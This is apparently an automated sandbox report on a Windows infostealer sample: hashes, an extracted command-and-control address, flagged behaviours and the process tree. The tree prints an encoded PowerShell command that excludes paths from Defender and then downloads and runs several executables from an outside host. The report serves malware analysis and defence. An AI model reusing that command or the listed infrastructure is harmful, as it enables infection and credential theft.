Analysis
-
max time kernel
55s -
max time network
72s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-02-2023 06:02
Static task
static1
General
-
Target
474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
-
Size
626KB
-
MD5
47b01695ff80b03ae518b333163da42c
-
SHA1
aa95d6c08ae9201828da23593e42df4a2e39ce82
-
SHA256
474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e
-
SHA512
886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466
-
SSDEEP
6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
SmartDefRun.exepowershell.EXEdescription pid Process procid_target PID 1756 created 3180 1756 SmartDefRun.exe 48 PID 1756 created 3180 1756 SmartDefRun.exe 48 PID 1756 created 3180 1756 SmartDefRun.exe 48 PID 1756 created 3180 1756 SmartDefRun.exe 48 PID 1892 created 600 1892 powershell.EXE 3 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 6 1488 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
new2.exeC4Loader.exeSmartDefRun.exeSysApp.exepid Process 3152 new2.exe 4892 C4Loader.exe 1756 SmartDefRun.exe 1956 SysApp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exeSmartDefRun.exepowershell.EXEdescription pid Process procid_target PID 1772 set thread context of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 1756 set thread context of 2476 1756 SmartDefRun.exe 116 PID 1892 set thread context of 2736 1892 powershell.EXE 121 -
Drops file in Program Files directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid Process 4396 sc.exe 3920 sc.exe 488 sc.exe 1468 sc.exe 2880 sc.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 1632 1772 WerFault.exe 79 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exeSysApp.exeSmartDefRun.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepid Process 1488 powershell.exe 1488 powershell.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1956 SysApp.exe 1756 SmartDefRun.exe 1756 SmartDefRun.exe 5092 powershell.exe 5092 powershell.exe 1756 SmartDefRun.exe 1756 SmartDefRun.exe 1756 SmartDefRun.exe 1756 SmartDefRun.exe 2728 powershell.exe 2728 powershell.exe 1756 SmartDefRun.exe 1756 SmartDefRun.exe 1892 powershell.EXE 1328 powershell.EXE 1892 powershell.EXE 1328 powershell.EXE 1892 powershell.EXE 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exewmic.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 1488 powershell.exe Token: SeIncreaseQuotaPrivilege 3548 wmic.exe Token: SeSecurityPrivilege 3548 wmic.exe Token: SeTakeOwnershipPrivilege 3548 wmic.exe Token: SeLoadDriverPrivilege 3548 wmic.exe Token: SeSystemProfilePrivilege 3548 wmic.exe Token: SeSystemtimePrivilege 3548 wmic.exe Token: SeProfSingleProcessPrivilege 3548 wmic.exe Token: SeIncBasePriorityPrivilege 3548 wmic.exe Token: SeCreatePagefilePrivilege 3548 wmic.exe Token: SeBackupPrivilege 3548 wmic.exe Token: SeRestorePrivilege 3548 wmic.exe Token: SeShutdownPrivilege 3548 wmic.exe Token: SeDebugPrivilege 3548 wmic.exe Token: SeSystemEnvironmentPrivilege 3548 wmic.exe Token: SeRemoteShutdownPrivilege 3548 wmic.exe Token: SeUndockPrivilege 3548 wmic.exe Token: SeManageVolumePrivilege 3548 wmic.exe Token: 33 3548 wmic.exe Token: 34 3548 wmic.exe Token: 35 3548 wmic.exe Token: 36 3548 wmic.exe Token: SeIncreaseQuotaPrivilege 3548 wmic.exe Token: SeSecurityPrivilege 3548 wmic.exe Token: SeTakeOwnershipPrivilege 3548 wmic.exe Token: SeLoadDriverPrivilege 3548 wmic.exe Token: SeSystemProfilePrivilege 3548 wmic.exe Token: SeSystemtimePrivilege 3548 wmic.exe Token: SeProfSingleProcessPrivilege 3548 wmic.exe Token: SeIncBasePriorityPrivilege 3548 wmic.exe Token: SeCreatePagefilePrivilege 3548 wmic.exe Token: SeBackupPrivilege 3548 wmic.exe Token: SeRestorePrivilege 3548 wmic.exe Token: SeShutdownPrivilege 3548 wmic.exe Token: SeDebugPrivilege 3548 wmic.exe Token: SeSystemEnvironmentPrivilege 3548 wmic.exe Token: SeRemoteShutdownPrivilege 3548 wmic.exe Token: SeUndockPrivilege 3548 wmic.exe Token: SeManageVolumePrivilege 3548 wmic.exe Token: 33 3548 wmic.exe Token: 34 3548 wmic.exe Token: 35 3548 wmic.exe Token: 36 3548 wmic.exe Token: SeIncreaseQuotaPrivilege 1812 WMIC.exe Token: SeSecurityPrivilege 1812 WMIC.exe Token: SeTakeOwnershipPrivilege 1812 WMIC.exe Token: SeLoadDriverPrivilege 1812 WMIC.exe Token: SeSystemProfilePrivilege 1812 WMIC.exe Token: SeSystemtimePrivilege 1812 WMIC.exe Token: SeProfSingleProcessPrivilege 1812 WMIC.exe Token: SeIncBasePriorityPrivilege 1812 WMIC.exe Token: SeCreatePagefilePrivilege 1812 WMIC.exe Token: SeBackupPrivilege 1812 WMIC.exe Token: SeRestorePrivilege 1812 WMIC.exe Token: SeShutdownPrivilege 1812 WMIC.exe Token: SeDebugPrivilege 1812 WMIC.exe Token: SeSystemEnvironmentPrivilege 1812 WMIC.exe Token: SeRemoteShutdownPrivilege 1812 WMIC.exe Token: SeUndockPrivilege 1812 WMIC.exe Token: SeManageVolumePrivilege 1812 WMIC.exe Token: 33 1812 WMIC.exe Token: 34 1812 WMIC.exe Token: 35 1812 WMIC.exe Token: 36 1812 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exevbc.exepowershell.exenew2.execmd.execmd.execmd.exeSmartDefRun.exepowershell.EXEdllhost.exedescription pid Process procid_target PID 1772 wrote to memory of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 1772 wrote to memory of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 1772 wrote to memory of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 1772 wrote to memory of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 1772 wrote to memory of 4328 1772 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe 81 PID 4328 wrote to memory of 1488 4328 vbc.exe 85 PID 4328 wrote to memory of 1488 4328 vbc.exe 85 PID 4328 wrote to memory of 1488 4328 vbc.exe 85 PID 1488 wrote to memory of 3152 1488 powershell.exe 88 PID 1488 wrote to memory of 3152 1488 powershell.exe 88 PID 1488 wrote to memory of 4892 1488 powershell.exe 89 PID 1488 wrote to memory of 4892 1488 powershell.exe 89 PID 1488 wrote to memory of 4892 1488 powershell.exe 89 PID 1488 wrote to memory of 1756 1488 powershell.exe 90 PID 1488 wrote to memory of 1756 1488 powershell.exe 90 PID 1488 wrote to memory of 1956 1488 powershell.exe 91 PID 1488 wrote to memory of 1956 1488 powershell.exe 91 PID 1488 wrote to memory of 1956 1488 powershell.exe 91 PID 3152 wrote to memory of 3548 3152 new2.exe 92 PID 3152 wrote to memory of 3548 3152 new2.exe 92 PID 3152 wrote to memory of 4816 3152 new2.exe 94 PID 3152 wrote to memory of 4816 3152 new2.exe 94 PID 4816 wrote to memory of 1812 4816 cmd.exe 96 PID 4816 wrote to memory of 1812 4816 cmd.exe 96 PID 3152 wrote to memory of 1316 3152 new2.exe 97 PID 3152 wrote to memory of 1316 3152 new2.exe 97 PID 1316 wrote to memory of 3768 1316 cmd.exe 99 PID 1316 wrote to memory of 3768 1316 cmd.exe 99 PID 3124 wrote to memory of 4396 3124 cmd.exe 106 PID 3124 wrote to memory of 4396 3124 cmd.exe 106 PID 3124 wrote to memory of 3920 3124 cmd.exe 107 PID 3124 wrote to memory of 3920 3124 cmd.exe 107 PID 3124 wrote to memory of 488 3124 cmd.exe 108 PID 3124 wrote to memory of 488 3124 cmd.exe 108 PID 3124 wrote to memory of 1468 3124 cmd.exe 109 PID 3124 wrote to memory of 1468 3124 cmd.exe 109 PID 3124 wrote to memory of 2880 3124 cmd.exe 110 PID 3124 wrote to memory of 2880 3124 cmd.exe 110 PID 3124 wrote to memory of 4712 3124 cmd.exe 111 PID 3124 wrote to memory of 4712 3124 cmd.exe 111 PID 3124 wrote to memory of 4280 3124 cmd.exe 112 PID 3124 wrote to memory of 4280 3124 cmd.exe 112 PID 3124 wrote to memory of 4312 3124 cmd.exe 113 PID 3124 wrote to memory of 4312 3124 cmd.exe 113 PID 3124 wrote to memory of 2408 3124 cmd.exe 114 PID 3124 wrote to memory of 2408 3124 cmd.exe 114 PID 3124 wrote to memory of 1100 3124 cmd.exe 115 PID 3124 wrote to memory of 1100 3124 cmd.exe 115 PID 1756 wrote to memory of 2476 1756 SmartDefRun.exe 116 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 1892 wrote to memory of 2736 1892 powershell.EXE 121 PID 2736 wrote to memory of 600 2736 dllhost.exe 3 PID 2736 wrote to memory of 680 2736 dllhost.exe 1 PID 2736 wrote to memory of 960 2736 dllhost.exe 75 PID 2736 wrote to memory of 416 2736 dllhost.exe 9 PID 2736 wrote to memory of 524 2736 dllhost.exe 74 PID 2736 wrote to memory of 904 2736 dllhost.exe 73 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:600
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:416
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a207f7fb-907e-44ba-841f-b0a440ffbcd2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1048
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3180
-
C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵PID:3768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 2403⤵
- Program crash
PID:1632
-
